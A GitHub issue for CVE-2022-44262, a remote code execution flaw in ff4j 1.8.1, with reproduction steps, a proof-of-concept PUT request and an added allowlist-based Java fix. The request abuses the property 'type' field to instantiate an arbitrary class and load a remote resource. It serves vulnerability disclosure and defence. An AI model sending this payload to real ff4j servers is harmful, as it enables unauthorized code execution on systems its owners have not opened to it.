CVE-2022-44262 · Issue #624 · ff4j/ff4j

ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).


ff4j can be used to call any constructor in the project or the JVM.
It raises an error after the constructor call and returns an error in the response.

File: https://github.com/ff4j/ff4j/blob/master/ff4j-core/src/main/java/org/ff4j/property/util/PropertyFactory.java
Function: public static Property<?> createProperty(String pName, String pType, String pValue, String desc, Set<String> fixedValues)
Lines: 163 and 164


git clone https://github.com/ff4j/ff4j-samples.git
cd ff4j-samples/spring-boot-2x/ff4j-sample-springboot2x   # the clone lands in ff4j-samples/
mvn spring-boot:run                                       # starts the sample on its default port


PUT /api/ff4j/propertyStore/properties/test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
accept: application/json
Content-Length: 111

{ "name": "test", "description": null, "type": "org.springframework.core.io.support.ResourcePropertySource", "value": "http://example/index.html"}
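The root cause described above is that a caller-supplied "type" string reaches reflection unchecked. Below is an added example (not ff4j's code) of the defensive gate a maintainer would put in front of such a lookup: an allowlist consulted before any class is loaded, followed by a subtype check. The allowlist entry and the `Object.class` base used in `main` are placeholders standing in for the real ff4j Property hierarchy.

```java
import java.util.Set;

// Added example, not ff4j's code: gate reflective instantiation of property
// types behind an allowlist before any class is loaded or constructed.
public class PropertyTypeGate {

    // Allowlist of permitted type names. The entry below is a placeholder;
    // a deployment lists only the concrete Property subclasses it uses.
    private static final Set<String> ALLOWED_TYPES = Set.of(
        "org.ff4j.property.PropertyString" // placeholder entry
    );

    /**
     * Resolves pType only if it is allowlisted and extends the given base
     * type. The allowlist check runs first, so an arbitrary class name such
     * as the one in the reported request is rejected without touching the
     * class loader; initialize=false keeps static initializers from running
     * for anything that does pass the allowlist.
     */
    public static Class<?> resolve(String pType, Class<?> base)
            throws ClassNotFoundException {
        if (pType == null || !ALLOWED_TYPES.contains(pType)) {
            throw new IllegalArgumentException("property type not permitted: " + pType);
        }
        Class<?> clazz = Class.forName(pType, false, PropertyTypeGate.class.getClassLoader());
        if (!base.isAssignableFrom(clazz)) {
            throw new IllegalArgumentException("not a property subtype: " + pType);
        }
        return clazz;
    }

    public static void main(String[] args) throws Exception {
        // Constructed input: the "type" value from the reported request.
        // Object.class stands in for the real Property base class here.
        String reported = "org.springframework.core.io.support.ResourcePropertySource";
        try {
            resolve(reported, Object.class);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Logging the rejected type name, as the catch block does, also gives defenders a detection signal for probing of this endpoint.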

Related news

GHSA-65hj-9ppw-77xc: ff4j is vulnerable to Remote Code Execution (RCE)
